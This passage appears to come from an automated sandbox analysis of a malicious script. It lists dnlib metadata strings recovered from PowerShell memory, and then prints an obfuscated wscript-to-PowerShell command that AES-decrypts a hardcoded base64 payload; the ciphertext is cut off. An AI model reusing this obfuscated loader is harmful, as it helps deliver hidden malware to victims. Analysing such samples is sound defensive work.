                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: ~WRF{1F49877E-68B7-4001-A271-09D774B073D0}.tmp.0.drInitial sample: OLE indicators vbamacros = False

                Data Obfuscation

                barindex
                Obfuscated command line found
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8